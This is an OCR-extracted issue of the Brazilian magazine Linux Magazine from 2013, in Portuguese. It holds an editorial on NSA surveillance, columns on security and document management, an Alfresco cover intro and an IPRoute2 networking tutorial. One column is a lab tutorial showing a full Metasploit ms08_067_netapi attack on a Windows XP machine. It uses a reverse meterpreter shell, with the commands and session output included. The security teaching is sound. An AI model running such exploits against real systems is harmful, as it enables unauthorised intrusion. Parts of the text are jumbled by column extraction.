AUGUSTO CAMPOS P.10 MADDOG P.25 CEZAR TAURION P.

29
Segurança é processo, A importância da Devemos pensar na
não é ferramenta criptografia e suas origens velocidade da nuvem MEDIALINX
# 106 Setembro 2013

A REVISTA DO PROFISSIONAL DE TI

GED
GESTÃO ELETRÔNICA DE DOCUMENTOS
ELIMINE AS PILHAS DE PAPEL QUE ACUMULAM-SE DIARIAMENTE
EM SUA MESA E RESOLVA O PROBLEMA DE ARMAZENAMENTO
ENTREVISTA p.23
DOS DOCUMENTOS: FAÇA PARTE DA TI VERDE. P.36 Entrevistamos John Powell, fundador do
Alfresco, um dos mais populares softwares
de ECM open source do mercado.
» Administração e gestão de documentos com Alfresco P.37
» Como utilizar o Alfresco para gerenciar os projetos da sua empresa P.42
» Aprenda a trabalhar com Alfresco e Liferay unidos ao servidor CAS P.49

VEJA TAMBÉM NESTA EDIÇÃO: ANDROID P.67

» IPRoute2 e o gerenciamento dos componentes de rede do kernel p.54 Transforme seu dispositivo Android em uma máquina
» Conheça a solução de servidor DNS alternativa ao BIND, PowerDNS p.58 de produtividade com aplicativos open source
» HURD: antigo projeto de sistema operacional volta à vida p.73

00107 #10709/13

R$ 14,90
€ 7,50
9 771806 942009

WWW.LINUXMAGAZINE.COM.BR
Expediente editorial
Diretor Geral
Rafael Peregrino da Silva
Editorial
Ridendo castigat moris
rperegrino@linuxmagazine.com.br
Editores
Flávia Jobstraibizer
fjobs@linuxmagazine.com.br
Laura Loenert Lopes
llopes@linuxmagazine.com.br
Editor de Arte Após as revelações sobre os desmandos da Agência Nacional de Segurança
Hunter Lucas Fonseca
hfonseca@linuxnewmedia.com.br (NSA, na sigla em inglês) dos Estados Unidos da América, que ocorreram na vi-
Colaboradores gência do governo de Barack “Yes we scan” Obama, e que são fruto da coragem,
Alessandro de Oliveira Faria, Antonio Pádua,
Bernhard Bablok, Kristian Kissling, Hanno Böck, da indignação e da abnegação de Edward Snowden, este escrevedor acompa-
Paul C. Brown, Dan Frost, Charly Kühnast, Frank
Hofmann, Robert Korherr, Heike Jurzik, Lars nha entediado o lento desenrolar dos acontecimentos, equipado de chistes e
Kotthoff, Kurt Seifried, Zack Brown, Jon “maddog”
Hall, Alexandre Borges, Cezar Taurion, Gilberto
reviravoltas característicos de uma comédia dantesca apresentada pelo grupo
Magalhães, Klaus Knopper, Augusto Campos. Monty Python. Risível o acionismo displicente e o reacionismo incoerente de
Tradução
Laura Loenert Lopes governos como o brasileiro e o alemão, que só se mostraram verdadeiramen-
Revisão te indignados quando seus maiores dignatários foram atingidos diretamente
Flávia Jobstraibizer
pelo esquema de espionagem perpetrado pelo grupo dos cinco olhos, aliança
Editores internacionais
Uli Bantle, Andreas Bohle, Jens-Christoph Brendel, composta por EUA, Inglaterra, Canadá, Nova Zelândia e Austrália, que nasceu
Hans-Georg Eßer, Markus Feilner, Oliver Frommel,
Marcel Hilzinger, Mathias Huber, Anika Kehrer,
ainda durante a vigência da Segunda Guerra Mundial, mais especificamente
Kristian Kißling, Jan Kleinert, Daniel Kottmair,
Thomas Leichtenstern, Jörg Luther, Nils Magnus.
em 1941, ano em que a guerra se tornou global.
Anúncios: Mais de uma vez o autor destas mal digitadas linhas ouviu comentários jo-
Rafael Peregrino da Silva (Brasil)
anuncios@linuxmagazine.com.br
cosos envolvendo a perda de dados, a falta de backup ou de informações, ou
Tel.: +55 (0)11 3675-2600 dúvidas a respeito de informações sobre qualquer pessoa ou empresa: “Per-
Penny Wilby (Reino Unido e Irlanda) gunte ao Obama” ou “Peça uma cópia ao Obama” ou ainda “O Obama sabe”
pwilby@linux-magazine.com
Amy Phalen (América do Norte)
eram as respostas, invariavelmente. Redes sociais mostraram várias imagens
aphalen@linuxpromagazine.com legendadas, brincando com tecnologias e termos que antes nunca apareciam,
Hubert Wiest (Outros países)
hwiest@linuxnewmedia.de tais como “Usa rede Tor e armazena seus dados no Gmail!”, com Obama & Cia se
Diretor de operações matando de rir ao fundo, ou a criança afirmando ao presidente dos EUA, “Pa-
Claudio Bazzoli
cbazzoli@linuxmagazine.com.br pai me disse que vocês estão nos espionando online”, que tem como resposta
Na Internet: “Ele não é seu pai” etc.
www.linuxmagazine.com.br – Brasil
www.linux-magazin.de – Alemanha Muito embora pouco tenha sido feito efetivamente após as suspeitas
www.linux-magazine.com – Portal Mundial
www.linuxmagazine.com.au – Austrália – que todos tínhamos desde sempre – terem sido confirmadas, quando o
www.linux-magazine.es – Espanha
www.linux-magazine.pl – Polônia
humor se apropria de fatos, isso significa que a informação chegou ao ima-
www.linux-magazine.co.uk – Reino Unido ginário coletivo e é propriedade das massas. Isso é ótimo, pois finalmente
www.linuxpromagazine.com – América do Norte
Apesar de todos os cuidados possíveis terem sido tomados temas envolvendo segurança da informação, privacidade, transparência
durante a produção desta revista, a editora não é responsá-
vel por eventuais imprecisões nela contidas ou por consequ-
etc. ganham a ribalta da mídia de massa. E, com isso, soluções mais segu-
ências que advenham de seu uso. A utilização de qualquer ras e abertas ganham relevância. Segurança da informação pode passar fi-
material da revista ocorre por conta e risco do leitor.
Nenhum material pode ser reproduzido em qualquer meio,
nalmente a ocupar o seu lugar de direito: a fase de concepção de soluções
em parte ou no todo, sem permissão expressa da editora.
Assume-se que qualquer correspondência recebida, tal
de tecnologia em geral! Dados abertos, Software Livre e governança de TI
como cartas, emails, faxes, fotografias, artigos e desenhos, são os ingredientes para resolver o problema, e estão sendo trombeteados
sejam fornecidos para publicação ou licenciamento a
terceiros de forma mundial não-exclusiva pela Linux New em 10 de 10 emissoras de rádio e televisão no país. Isso é mais um impulso
Media do Brasil, a menos que explicitamente indicado.
para o software de código aberto, que devem corrigir algumas distorções
Linux é uma marca registrada de Linus Torvalds.
Linux Magazine é publicada mensalmente por: há muito arraigadas no uso de sistemas de informação. Quando chegamos
Linux New Media do Brasil Editora Ltda. à fase do riso, do ridículo, é que efetivamente conseguimos corrigir certos
Rua São Bento, 500
Conj. 802 – Sé costumes. Assim, o Brasil está se movimentando para instaurar um e-mail
01010-001 – São Paulo – SP – Brasil
Tel.: +55 (0)11 3675-2600 nacional para órgãos do governo federal (usando a solução Expresso Livre,
Direitos Autorais e Marcas Registradas © 2004 - 2013: projeto de Software Livre baseado no Tine20 capitaneado pelo Serpro), o
Linux New Media do Brasil Editora Ltda.
Impressão e Acabamento: EGB Marco Civil da Internet ganhou a pauta do Congresso Nacional e vamos
Atendimento Assinante sediar conferência sobre governança na Internet.
www.linuxnewmedia.com.br/atendimento
São Paulo: +55 (0)11 3675-2600 Só rindo mesmo!
Rio de Janeiro: +55 (0)21 3512 0888
Belo Horizonte: +55 (0)31 3516 1280
ISSN 1806-9428 Impresso no Brasil Rafael Peregrino da Silva
Diretor de Redação

Linux Magazine #107 | Outubro de 2013 3

 INDICE
CAPA
Sob controle 36
Manter o controle das pilhas de papel que diariamente acumulam-se
nas mesas e gavetas pode não ser mais uma tarefa hercúlea.
Trabalho em equipe 49
Aprenda a trabalhar colaborativamente com Alfresco e Liferay
unidos ao servidor de autenticação CAS.

Colaborativo 37
A ferramenta de colaboração Alfresco permite rastrear documentos,
compartilhar conteúdo e integra-se muito bem com o Microsoft SharePoint.

Projetos sob controle 42

Como utilizar Alfresco Community para prover
amplo suporte para os projetos de sua empresa.

4 www.linuxmagazine.com.br
 Linux Magazine 107 | índice

COLUNAS CORPORATE
Charly Kühnast 07 Coluna: Jon “maddog” Hall 25
Alexandre Borges08 Coluna Antonio Pádua 27
Augusto Campos 10 Coluna: Cezar Taurion 29
Kurt Seifried 12
Entrevista: John Powell 31
Klaus Knopper 15
Notícias 34
Zack Brown 18
➧ Fundação de Bill Gates financia pesquisas brasileiras
Notícias 24
➧ Garoto de 12 anos hackeia sites do governo
➧ Cibercriminosos mudam táticas em para o Anonymous em troca de games
ataques DDoS, dizem pesquisadores

REDES
Caixa de ferramentas 54
Ferramentas tradicionais de administração de redes por
linha de comando, tais como ifconfig, route e arp são quase
tão antigas como o próprio protocolo TCP/IP. Neste artigo,
oferecemos uma visão geral sobre como o IPRoute2 pode
unificar o gerenciamento dos componentes de rede do kernel.

TUTORIAL
Zona de poder 58
O PowerDNS é uma solução de servidor DNS segura,
escalonável e confiável, licenciado sob a GPL.
Neste artigo, mostramos como usar arquivos deconfiguração
do BIND para configurar o servidor PowerDNS e como
criar um servidor primário com um backend MySQL
gerenciado pela interface de usuário Poweradmin.

´
ANALISE
Em busca do sistema perdido 73
O GNU não desistiu do venerável Hurd, projeto de
sistema operacional que recebeu recentemente um
novo impulso com o lançamento de um novo porte Debian.

ANDROID SERVIÇOS
Editorial03
Máquina de produção 68
Emails06
Transforme seu dispositivo Android em uma
máquina de produtividade enxuta com Linux.local78
aplicativos de código aberto.
Preview 82

Linux Magazine #107 | Outubro de 2013 5

 Coluna do Alexandre
Metasploit – parte 7
Demonstração de um ataque direcionado usando o framework Metasploit
e tendo como alvo o sistema operacional Windows XP.
por Alexandre Borges

N
este mês é a vez de uma demonstração Overflow
simples de ataque usando o framework exploit/windows/smb/ms06_070_wkssvc 2006-11-14
00:00:00 UTC manual Microsoft Workstation Service
Metasploit e tendo como alvo o sistema
NetpManageIPCConnect Overflow
operacional Windows XP com SP2. Entretanto, de- exploit/windows/smb/ms08_067_netapi 2008-10-28
vido à solicitação de alguns leitores, vou fazer duas 00:00:00 UTC great Microsoft Server Service
mudanças de abordagem: primeiro, vou utilizar o Relative Path Stack Corruption
OpenVAS que é um scanner gratuito e, segundo,
vou fazer uso do Kali Linux (sucessor do fantásti- Feito isso, selecione a vulnerabilidade que de-
co Backtrack R3). Os motivos para a mudança são seja explorar (neste caso será a última da lista
simples: tenho recebido relatos sobre a dificuldade apresentada), para iniciar o ataque:
de realizar testes adicionais com o Nessus devido
ao curto tempo concedido para teste do produto msf> use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show payloads
(15 dias) e, com relação ao Kali Linux, alguns lei-
tores alegaram que seria mais simples usá-lo já msf exploit(ms08_067_netapi) > set payload windows/
que este fornece muitas ferramentas de hacking meterpreter/reverse_tcp
integradas e, como normalmente os notebooks
não têm muita memória RAM, isto comprometia payload => windows/meterpreter/reverse_tcp
o uso de máquinas virtuais.
Sobre o OpenVAS, o leitor pode obter um roteiro msf exploit(ms08_067_netapi) > show options
rápido de configuração em [1]. Em primeiro lugar, Module options (exploit/windows/smb/ms08_067_netapi):
vamos obter uma lista das vulnerabilidades do alvo:
Name Current Setting Required Description
root@hacker:~# msfconsole –- ––––– ––-- –––--
msf> search netapi RHOST 192.168.1.23 yes The target address
RPORT 445 yes Set the SMB service port
Matching Modules SMBPIPE BROWSER yes The pipe
================ name to use (BROWSER, SRVSVC)
Name
Payload options (windows/meterpreter/reverse_tcp):
Disclosure Date Rank
Description
–- ––––– –- Name Current Setting Required Description
–––-- –- ––––– ––-- –––--
exploit/windows/smb/ EXITFUNC thread yes Exit
ms03_049_netapi 2003-11-11 technique: seh, thread, process, none
00:00:00 UTC good LHOST 192.168.1.109 yes The listen address
Microsoft LPORT 4444 yes The listen port
Workstation Service
NetAddAlternateComputerName Exploit target:
Overflow
exploit/windows/
smb/ms06_040_ Id Name
netapi 2006-08- -- –-
08 00:00:00 UTC 0 Automatic Targeting
good Microsoft
Server Service msf exploit(ms08_067_netapi) > set LHOST
NetpwPathCanonicalize 192.168.1.109

8 www.linuxmagazine.com.br
LHOST => 192.168.1.109
msf exploit(ms08_067_netapi) > set RHOST Sufixo DNS especĩfico de conexão . :
192.168.1.23 Endereço IP . . . . . . . . . . . . :
RHOST => 192.168.1.23 192.168.1.23
msf exploit(ms08_067_netapi) > show options Máscara de sub-rede . . . . . . . . :
255.255.255.0
msf exploit(ms08_067_netapi) > exploit Gateway padrão. . . . . . . . . . . :
192.168.1.1
[*] Started reverse handler on 192.168.1.109:4444
[*] Automatically detecting the target... Adaptador Ethernet Conexão de Rede Bluetooth:
[*] Fingerprint: Windows XP - Service Pack 2 -
lang:Portuguese - Brazilian Estado da mídia . . . . . . . . . . . :
[*] Selected Target: Windows XP SP2 Portuguese - mídia desconectada
Brazilian (NX)
[*] Attempting to trigger the vulnerability... C:\WINDOWS\system32>
[*] Sending stage (770048 bytes) to 192.168.1.23
Como o leitor pôde notar, usei um payload vin-
[*] Meterpreter session 1 opened (192.168.1.109:4444
-> 192.168.1.23:1048) at 2013-10-24 20:14:03 -0200 culado ao Meterpreter, que é uma ferramenta usa-
da no pós exploração da vulnerabilidade. Falarei
meterpreter > shell 1 mais sobre ele nas próximas colunas. Até mais.
Process 2988 created.
Channel 1 created.
Microsoft Windows XP [versão 5.1.2600]
Mais informações
[1] Roteiro de configuração do OpenVAS:
(C) Copyright 1985-2001 Microsoft Corp. http://alexandreborgesbrazil.files.word-
press.com/2013/10/quicksectip21.pdf
C:\WINDOWS\system32>ipconfig
ipconfig
Alexandre Borges (linkedin: br.linkedin.com/in/aleborges) é instrutor e especialista sênior
em sistemas operacionais Unix, Linux, Banco de Dados, Virtualização, Cluster, Storage, Ser-
Configuração de IP do Windows vidores, Backup, Desempenho e Segurança, além de possuir profundo envolvimento com
assuntos relacionados ao kernel Linux.
Adaptador Ethernet Conexão local:

Linux Magazine #XX | Mês de 200X 9

 Coluna do Augusto
Segurança é processo,
não é ferramenta
Nem sempre a implementação de uma nova ferramenta pode resolver os problemas de uma organização.
por Augusto Campos
A
segurança da informação compartilha com
o gerenciamento eletrônico de documentos
(GED), tema desta edição da Linux Magazine,
uma triste sina: a de ser um processo que, por razões
variadas, sofre porque as organizações interessadas
nele acreditam que poderão “resolver” seus problemas
com a aquisição e implantação de uma ferramenta.
Estou próximo ao mercado de TI há cerca de 25
anos, já vi procedimentos bem-sucedidos, mas...
foram raros. Em várias situações observei a confir-
mação da sina: alguém decidiu “implantar GED”, ou
“implantar segurança da informação” e isso acabou
se traduzindo, na prática, em fazer um curso de sen-
sibilização, um processo de seleção da ferramenta
e a aquisição desta. Quando o projeto avança mais,
chega até uma implementação e, em raros casos,
uma ativação, seguida de uma descontinuação quan-
do se percebe que a ferramenta, sem a adequação
de processos que teria que ter ocorrido antes, não
resolve o problema e ainda atrapalha.
No caso da Segurança da Informação, o “atrapalhar”
ganha uma dimensão a mais: quando a organização
se considera mais segura por ter adquirido determi-
nada ferramenta, mas não lidou com a
questão realmente essencial, que são
seus processos, ela acaba ficando
menos segura do que antes, por-
que as pessoas passam a acreditar
que a ferramenta lhes concede um
manto de proteção que na verdade
não está lá, mais ou menos como na-
quela fábula que termina com um
garoto gritando “o rei está nu!”.
Um caso que tenho acom-
panhado com bastante aten-
ção é o do Governo Federal.
Após as revelações de que
a NSA acompanhava as co-
municações eletrônicas de
várias pessoas-chave de
Brasília, logo começaram
10
os avisos de que teríamos a reação na forma da im-
plementação de ferramentas: um sistema de e-mails
criptografado operado por uma estatal para uso da
população e outro sistema de e-mails criptografado
para uso do próprio Governo.
O sistema em si é o Expresso, desenvolvido por
uma empresa pública a partir de código aberto, como
um ramo da árvore de desenvolvimento da solução
de groupware Tine20 [1]. Seu uso nas comunicações
online da administração pública será obrigatório e a
solução de criptografia será de origem local. Neste caso
específico há um detalhe especial: ela já foi tornada
de uso obrigatório antes mesmo de estar disponível.
Os questionamentos já começam a aparecer. Por
exemplo: o que acontece quando o interlocutor das
comunicações está em outro sistema de e-mail? Ou
o que acontece quando a infraestrutura de rede e
telecomunicações (servidores, roteadores, malha
de fibra óptica, transmissões via satélite etc.) forem
do prestador de serviço externo, ou os equipamen-
tos usados por ela forem fabricados fora do país?
O presidente da empresa pública em questão já
se pronunciou, dizendo à imprensa que na sua infra-
estrutura ele garante que não haverá invasão. Já o
general chefe do Centro de Defesa Cibernética do
Exército reconhece que a maior deficiência é mes-
mo de equipamentos de redes – como servidores
e roteadores – desenvolvidos no país, e o diretor
deste tema no Gabinete de Segurança Institucional
da Presidência da República reconhece que essa
ação não resolve a questão da espionagem ou de
monitoramento de dados, mas é um primeiro passo.
Podemos escolher em quais dos 3 iremos acre-
ditar, mas uma coisa é certa: o sucesso ou insuces-
so dessa iniciativa de “solução de Segurança da
Informação por meio de implementação de fer-
ramenta será caso de estudo por muito tempo. n
Mais informações
[1] Tine20: http://tine20.org
www.linuxmagazine.com.br
Linux Magazine #XX | Mês de 200X 11
 Capa
Sob controle
Manter o controle das pilhas de papel que diariamente acumulam-se
nas mesas e gavetas pode não ser mais uma tarefa hercúlea.
por Flávia Jobstraibizer
S
omos seres que guardam
coisas por natureza. Mes-
mo as pessoais mais "de-
sapegadas" costumam guardar
aquilo de que um dia podem
precisar. E somos assim com pa-
péis. Produzimos e consumimos
uma quantidade exorbitante
de papel todos os dias. Ele está
presente nas embalagens, nos
livros, nas revistas, nos jornais,
nos canhotos das máquinas de
cartão de débito, nos boletos
que você recebe mensalmente
para pagar, nos documentos... e
é aí que queremos chegar nesta
edição da Linux Magazine, onde
vamos falar sobre GED (Gestão
Eletônica de Documentos), área
onde popularizou-se o sistema
Alfresco por possuir uma solução
open source (versão Community)
e que irá auxiliá-lo a economizar
árvores e dinheiro.
O Alfresco possui a capacidade
de armazenar todos os tipos de
documentos em formato digital.
36
Estes documentos digitais po-
dem ser argupados por projetos,
vinculados à determinados gru-
pos de usuários e seguir fluxos
de trabalho predeterminados,
passando por aprovações, mar-
cações e outros requisitos até o
armazenamento final.
Com o poderoso Apache Lucene
por trás do sistema de indexação
de conteúdo do Alfresco, a plata-
forma é ainda muito ágil na bus-
ca e localização de documentos
através de palavras chave, nomes,
parâmetros, status do documento
e outras formas de busca.
Imagine o enorme volume que
faria uma tonelada de papeis em
sua empresa: pilhas até o teto de
contratos, processos, documentos
de funcionários, termos de acordo
entre fornecedores, negociação
com bancos etc. Uma tonelada de
papel virgem (nunca usado nem
reciclado) equivale à vida de 12 ár-
vores e para sua fabricação são uti-
lizados cerca de 540 litros de água!
Agora imagine se todos estes
documentos estivessem armaze-
nados digitalmente em um siste-
ma (que pode estar na nuvem) que
pode ser consultado a qualquer
momento, facilitando a vida de
quem precisa manipular tanto
papel? Este é o futuro. E é dele
que vamos falar nesta edição.
Nas próximas páginas você irá
conhecer o Alfresco, como instalar,
configurar e gerenciar projetos de
armazenamento digital de docu-
mentos, assim como criar regras
do fluxo a seguir por determinado
documento e a organização neces-
sária para ter sempre tudo à mão.
Sabemos que eliminar o papel
totalmente é impossível (pelo
menos por enquanto...) mas até
lá, viva a TI verde! n
Matérias de capa
Coperativismo 37
Projetos sob controle 38
Trabalho em equipe 49
www.linuxmagazine.com.br
 Redes
Caixa de ferramentas
Ferramentas tradicionais de administração de redes por linha de comando, tais como ifconfig, route
e arp são quase tão antigas quanto o próprio protocolo TCP/IP. Neste artigo, oferecemos uma visão
geral sobre como o IPRoute2 pode unificar o gerenciamento dos componentes de rede do kernel.
por Eric Amberg
O
IPRoute2 é o sucessor dos
utilitários de rede netto-
ols, incluindo comandos
como ifconfig e route. Em vez de
ter que usar uma ferramenta
separada para cada aspecto do
gerenciamento de rede, com o
IPRoute2 os administradores
têm agora uma interface unifi-
cada. Embora o IPRoute2 esteja
disponível há algum tempo, a
equipe de desenvolvimento tem
se esforçado para substituir as
ferramentas legadas.
Escopo de recursos
O IPRoute2 [1] permite ao admi-
nistrador gerenciar a maioria
dos aspectos da rede, in-
cluindo:
54
➧ Configuração IP de interfaces
➧ Inclusão e exclusão de entradas
na tabela de roteamento
➧ Ajuste de configurações de ca-
che ARP ou NDISC (Neighbor Disco-
very ou descoberta de vizinhança)
➧ Gerenciamento de túneis
da rede
➧ Visualização de informações da
camada de link (endereços MAC etc.)
➧ Configuração de Qualidade de
Serviço (Quality of Service – QoS)
Recursos de gerenciamen-
to cobrem tanto o IPv4 como
IPv6, e novos recursos são imple-
mentados rotineiramente. Por
exemplo, o gerenciamento de
túnel 6rd [2] já foi adicionado. O
IPRoute2 agora faz parte da ins-
talação básica definida para
todas as principais dis-
tribuições Linux
e é fundamental para muitos
dos recursos avançados de rede.
Por exemplo, o IPRoute2 é
necessário para algumas fun-
ções de gateway e roteamento.
Mesmo o desktop Gnome não
consegue se comunicar na rede
sem o IPRoute2.
Programas e
arquivos IPRoute2
Normalmente, os arquivos de
configuração para as ferramentas
individuais estão localizados em
/etc/iproute2 e contêm alguns
valores necessários apenas
em cenários avançados.
A maioria dos pro-
www.linuxmagazine.com.br
gramas fornecidos pelo IPRou-
te2 possui uma tarefa especial,
e todos eles desempenham um
papel específico no gerenciamen-
to dos recursos de rede:
➧ /sbin/ip – O programa prin-
cipal, através do qual a maioria
dos aspectos de rede do kernel
Linux pode ser controlada
➧ /sbin/cbq – Serve como um
script de exemplo para a classe
baseada em QoS (class-based
queuing, CBQ)
➧ /sbin/ifcfg – Substitui a opção
de gerenciamento de endereço
de IP em ifconfig
➧ /sbin/rtmon – Habilita o monito-
ramento da tabela de roteamento
➧ /sbin/tc – Usada para confi-
gurar recursos de controle avan-
çado de tráfego
➧ /sbin/arpd – Coleta informação
ARP gratuita. Estas mensagens ARP
anunciam uma alteração no mape-
amento de endereço IP-to-MAC
➧ /sbin/lnstat – Exibe estatísti-
cas do kernel em vários aspectos
da comunicação de rede e subs-
titui o rtstat
➧ Ferramentas adicionais –
/sbin/nstat e /sbin/rtacct são fer-
ramentas simples para exibição
de contadores SNMP e estatís-
ticas de rede
A ferramenta mais importante
no IPRoute2 é a ip. Ele lida com a
maioria das tarefas comuns asso-
ciadas ao gerenciamento de rede,
especificando objetos particulares
e fornecendo a eles os parâmetros
e opções desejadas que servirão
de contexto. Contextos importan-
tes incluem, por exemplo:
➧ Link – Exibe ou manipula a
informação em nível de cama-
da de link
➧ Address – Exibe ou manipula
informações de IP
➧ Route – Exibe ou manipula
informações de roteamento
➧ Tunnel – Exibe ou manipula
configurações de tunelamento
Linux Magazine #107 | Outubro de 2013
➧ Xfrm – Exibe ou manipula
políticas de Ipsec
Os comandos normalmente não
precisam ser totalmente preenchi-
dos como regra; eles podem ser
completados apenas à medida em
que se tornam inequívocos. Assim,
ip, ip addr e ip a, todos disponibili-
zam a configuração IP da interface.
O comando completo é, na verdade,
ip address show, e comandos de exi-
bição apropriados estão disponíveis
para quase todos os contextos. Es-
tes também podem ser os valores
padrão (figura 1). Em muitos casos,
as opções adicionais podem ser
definidas para os comandos exibi-
dos. Por exemplo, se o usuário só
quer exportar a configuração de IP
para eth0, o atalho do comando é:
ip address show eth0 or ip a s eth0
Assim como acontece com o
ifconfig, as informações para IPv4
e IPv6 estão disponiveis. Se o u-
suário preferir restringir a saída
para uma das duas versões do
protocolo, poderá habilitar a op-
ção ip -4 ou ip -6 como um filtro.
Auto-ajuda
A ajuda está disponível a partir das
man pages para cada ferramen-
ta do pacote IPRoute2 e através
da opção de ajuda, que pode ser
especificada após o respectivo
contexto. Por exemplo,
ip addr help
exibe a ajuda relacionada às op-
ções ip addr. Informações deta-
Figura 1 A ferramenta mais importante no IPRoute2 é a ferramenta ip.
lhadas são fornecidas pelas man
pages para os contextos indivi-
duais. No caso do ip addr, por
exemplo, o usuário pode chamar:
man ip‑address
A chamada específica necessá-
ria para o contexto em questão é
exibida na seção SEE ALSO (“Veja
também”) da man page para o pró-
prio comando ip, ou seja, man ip 8.
Gerenciamento
de endereços IP
Para atribuir um endereço IP
adicional de 172.16.55.1/24 para
a interface eth0, o usuário deve
emitir o seguinte comando:
ip address add 172.16.55.1/24 brd
172.16.55.255 dev eth0
A especificação do endereço
de broadcast (brd) é opcional,
mas ainda recomendada. Para
remover a atribuição de um en-
dereço IP de uma interface, o u-
suário precisa da opção del, como
mostra o exemplo a seguir:
ip address del 172.16.55.1/24 dev
eth0
A opção flush toma uma linha
um pouco mais difícil, e também
permite que o usuário remova
todos os endereços IP a partir
de uma interface. Para remover
todos os endereços IP da inter-
face eth0, digite:
ip address flush dev eth0
55

Figura 2 Exibição da política de prefixo para o IPv6.
Esta condição persiste até que a
interface seja reinicializada. Além dis-
so, as interfaces baseadas em DHCP
não atribuem um novo endereço
até que o endereço anterior seja
removido. O importante é que este
tipo de manipulação de endereço
IP para uma interface não acabe no
arquivo de configuração. Depois de
reinicializar a interface ou reiniciar
o sistema, as alterações feitas pelo
comando ip não estão mais disponí-
veis. Se desejar que permaneçam,
crie um script de inicialização.
Predestinado
para IPv6
O comando ip permite visualizar e
manipular os recursos avançados
do IPv6. Isso inclui, por exemplo,
a política de prefixo da RFC 3484,
que define as regras pelas quais
são utilizados os diversos ende-
reços IPv6. Esta política pode ser
exibida, digitando ip addrlabel ou
ip addrl (figura 2). A identificação
determina a prioridade de cada
endereço. Os prefixos IPv6 co-
nhecidos são usados aqui.
Como os vários endereços IPv6
atribuídos a uma interface IPv6
habilitada possuem um escopo
diferente, as identificações ga-
rantem que um pacote IPv6 usa
um endereço de remetente que
corresponde ao endereço de des-
tino. Para fazer isso, a identifica-
ção de um endereço de origem
56
em um pacote de entrada é usada
para encontrar um endereço local
adequado, que possui o mesmo al-
cance. Por exemplo, para adicionar
outra entrada ao prefixo 2002::2/64
com uma identificação de 99 a esta
política de prefixo, digite:
ip addrlabel add prefix 2002::2/64
label 99
Ou ainda:
ip addrlabel del prefix 2002::2/64
label 99
para remover os prefixos com as
identificações novamente.
Um nível abaixo
Informações de camada de link,
isto é, endereços MAC e seme-
lhantes, são tratadas pela opção
link. Por exemplo, usar ip link ou
ip link show exibe as informações
de baixo nível sobre as interfaces
Figura 3 Informações de camada de link são exibidas pela ferramen-
ta ip com a opção link.
(figura 3) de uma forma similar ao
ip address. Usar:
ip ‑s link show
oferece uma panorâmica estatís-
tica das interfaces disponíveis,
que podem ser limitadas pela
adição da interface:
ip ‑s link show eth0
De uma forma que é quase
típica ao Linux, o usuário pode
estender a saída adicionando
outro parâmetro -s. Por exemplo:
ip ‑s ‑s link show eth0
No entanto, combinar -s e -ss
não é possível. O comando ip set
link permite definir diversos pa-
râmetros de hardware para as in-
terfaces. Por exemplo, o usuário
pode desligar a interface eth0 com:
ip link set eth0 down
e acioná-la novamente com:
ip link set eth0 up
Além disso, é possível manipular
a unidade de transmissão máxima
(MTU), o endereço MAC, o modo
promíscuo, e outros parâmetros.
Bons vizinhos
Outra opção útil é neighbor (des-
coberta de vizinhança). Ela permi-
te que os administradores exibam
e manipulem o cache ARP IPv4 e
www.linuxmagazine.com.br
o cache NDISC IPv6 [3]. O NDISC
substitui o mecanismo ARP no
IPv6. O comando:
ip neighbor show
retorna todos os mapeamentos
em cache entre endereços MAC e
endereços lógicos para IPv4 e IPv6.
Para restringir os resultados a um
protocolo, adicione -4 ou -6 (por
exemplo, ‑4 ip neighbor show). Em
algumas situações, as atribuições
de endereçamento estático são
úteis (por exemplo, para tornar
a falsificação de endereço mais
difícil). Além disso, selecionar o
acesso preventivo a hosts com um
endereço da camada de link inten-
cionalmente incorreto significa que
um host não pode ser endereçado.
Se quiser atribuir o endereço
IP 10.1.1.1 para um endereço fixo
MAC de 00:d0:a7:b1:c7:de em
eth1, o seguinte comando irá
fazer o truque:
ip neigh add 10.1.1.1 lladdr
00:d0:a7:b1:c7:de dev eth1 nud perm
Aqui, o nud significa Neighbor
Unreachability Detection, um me-
canismo que foi introduzido no
IPv6, mas que também pode de-
finir o status de uma entrada no
IPv4. Por outro lado, uma entrada
pode também ser removida com:
ip neigh del 10.1.1.1 dev eth1
A caixa de ferramentas IPRou-
te2 é extremamente abrangente;
o comando ip sozinho engloba um
número aparentemente infinito
de possibilidades e opções.
Mais opções
para o ip
O comando ip route permite vi-
sualizar e manipular a tabela de
roteamento do kernel. Por exem-
plo, ip route show exibe a tabela de
roteamento IPv4, e ip -6 route show
gera a mesma saída para IPv6. Uma
Linux Magazine #107 | Outubro de 2013
rota estática, por exemplo, para o
prefixo 200.1.1.0/24 através do pró-
ximo intervalo (hop) em 10.1.1.254
pode ser criado com o comando:
ip route add 200.1.1.0/24 via
10.1.1.254
Da mesma forma, podemos ex-
cluir ou modificar rotas, ou mesmo
configurar caminhos de destino
(paths) proibidos. Esta aborda-
gem se aplica igualmente a IPv4 e
IPv6, é claro. Com o comando ip, o
usuário também pode ajustar as
propriedades de multicast, confi-
gurar diferentes tipos de túneis, e
manipular o Routing Policy Data-
base (RPDB) [4], que determina a
tabela de roteamento usada para
encaminhar um pacote.
Controle
de tráfego
Além do comando ip, o IPRoute2
oferece várias outras maneiras de
manipular o tráfego da rede – em
particular, a ferramenta tc (Traffic
Control). Com ela, o usuário pode
gerenciar o QoS e o controle de
tráfego, que se baseia em mecanis-
mos de filas, onde filas individuais
(filas de interface) são atribuídas
a determinado tráfego. Na base
dos mecanismos de QoS IP, que
estabelecem um valor apropriado
ao byte Type of Service (ToS) no
cabeçalho IP, cada pacote pode
ser atribuído a uma determina-
da fila, a qual, por sua vez, está
associada a uma prioridade de
processamento predeterminada.
Desta forma, o kernel Linux
pode assegurar que uma deter-
minada quantidade de largura de
banda é reservada para os fluxos
de tráfego importantes, enquanto,
ao mesmo tempo, os menos impor-
tantes são limitados. O conceito
de controle de tráfego depende
de vários mecanismos, incluindo
CBQ [5], em que o tráfego é divi-
dido em diversas classes, que são
então priorizadas.
Conclusão
O IPRoute2 é uma caixa de ferra-
mentas completa com recursos
que não são imediatamente apa-
rentes. Embora o pacote de ferra-
mentas já seja usado em muitos
cenários por trás dos bastidores, a
sua utilização na linha de comando
não tem ganhado muita força en-
tre os administradores de redes e
sistemas. No entanto, a curva de
aprendizagem não é tão longa e
difícil como muitos temem.
Claro, o usuário não pode com-
preender intuitivamente todas as
opções e recursos do IPRoute2 em
um primeiro momento, mas pode
trabalhar com ferramentas como
ip e tc rapidamente que oferecem
novas oportunidades que podem
ser de valor inestimável para a aná-
lise e resolução de problemas. Além
disso, é preciso considerar que o
aguardado IPv6 não pode mais ser
gerenciado de outra forma que não
com a nova ferramenta ip.
